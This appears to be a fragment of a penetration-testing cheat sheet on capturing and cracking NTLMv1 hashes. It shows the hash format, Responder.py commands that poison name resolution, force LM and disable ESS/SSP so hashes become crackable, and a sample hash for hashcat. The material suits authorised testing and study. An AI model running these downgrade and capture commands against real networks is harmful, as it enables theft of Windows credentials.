NTLMv1
username::hostname:response:response:challenge -> NTHASH:responseDowngrading
# Receive and attempt to crack the hash with crack.sh's rainbow tables
Responder.py -I $interface --lm
# Attempt to remove ESS/SSP and crack locally or for a fee
Responder.py -I $interface --lm --disable-essCracking NTLMv1
hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788Attacking a Domain Controller
References
Last updated
